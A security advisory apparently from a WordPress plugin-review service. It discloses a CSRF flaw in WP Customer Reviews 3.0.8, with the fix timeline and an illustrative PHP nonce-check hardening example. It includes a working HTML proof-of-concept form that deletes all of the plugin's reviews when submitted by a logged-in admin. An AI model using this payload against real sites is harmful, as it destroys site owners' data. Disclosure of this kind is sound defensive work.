06 Apr

Cross-Site Request Forgery (CSRF) Vulnerability in WP Customer Reviews

We recently discovered that the WP Customer Reviews plugin had a cross-site request forgery (CSRF) vulnerability. In version 3.0.8, and some prior versions, the plugin did not ensure that actions, including deleting all of the reviews created by the plugin, were actually intended by the requesting user, because it did not verify a nonce before acting.

Proof Of Concept

The following proof of concept will delete all of the plugin’s reviews.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<head>
</head>
<body>
<form action="http://[path to WordPress]/wp-admin/admin.php?page=wpcr3_options&tab=tools" method="post">
<input type="hidden" name="wpcr3_debug_code" value="delete-all-reviews" />
<input type="hidden" name="wpcr3_confirm" value="YES" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
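The defensive pattern that closes this class of bug, shown as an added illustration rather than the plugin's own code or its actual 3.0.9 patch: the handler and render functions, the nonce action name and the wpcr3_example_delete_all_reviews() helper are assumed for the example, while the two POST field names come from the proof of concept above.

```php
<?php
// Added example, not WP Customer Reviews code. Assumes a helper
// wpcr3_example_delete_all_reviews() that performs the actual deletion.

// Form side (hardened): emit a nonce bound to this specific action and user.
function wpcr3_example_render_tools_form() {
    echo '<form method="post">';
    wp_nonce_field( 'wpcr3_delete_all_reviews', 'wpcr3_nonce' );
    echo '<input type="hidden" name="wpcr3_debug_code" value="delete-all-reviews" />';
    echo '<input type="hidden" name="wpcr3_confirm" value="YES" />';
    submit_button( 'Delete all reviews' );
    echo '</form>';
}

// VULNERABLE pattern: acts on POST fields alone. Any third-party page can
// submit these two fields, and the browser attaches the admin's cookies.
function wpcr3_example_handle_tools_vulnerable() {
    if ( isset( $_POST['wpcr3_debug_code'] ) && 'delete-all-reviews' === $_POST['wpcr3_debug_code']
         && isset( $_POST['wpcr3_confirm'] ) && 'YES' === $_POST['wpcr3_confirm'] ) {
        wpcr3_example_delete_all_reviews();
    }
}

// HARDENED pattern: capability check plus nonce verification before acting.
function wpcr3_example_handle_tools_hardened() {
    if ( ! isset( $_POST['wpcr3_debug_code'] ) ) {
        return;
    }
    // Being logged in is not enough; the request must also prove it was
    // produced by a form this site rendered for this user.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }
    // Calls wp_die() if the nonce field is missing, stale, or issued for a
    // different action or user, so the forged request never reaches the delete.
    check_admin_referer( 'wpcr3_delete_all_reviews', 'wpcr3_nonce' );

    if ( 'delete-all-reviews' === $_POST['wpcr3_debug_code']
         && isset( $_POST['wpcr3_confirm'] ) && 'YES' === $_POST['wpcr3_confirm'] ) {
        wpcr3_example_delete_all_reviews();
    }
}
```

Both functions hook into the same admin page; the only difference the PoC sees is that the hardened handler dies before deletion because the forged form cannot carry a valid wpcr3_nonce value.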

Timeline

  • 4/4/2016 – Developer notified.
  • 4/5/2016 – Version 3.0.9 released, which fixes vulnerability.

Concerned About The Security of The Plugins You Use?

When you are a paying customer of our service (you can currently try the service free for the first month), you get to suggest/vote on what plugins we will do security reviews of.
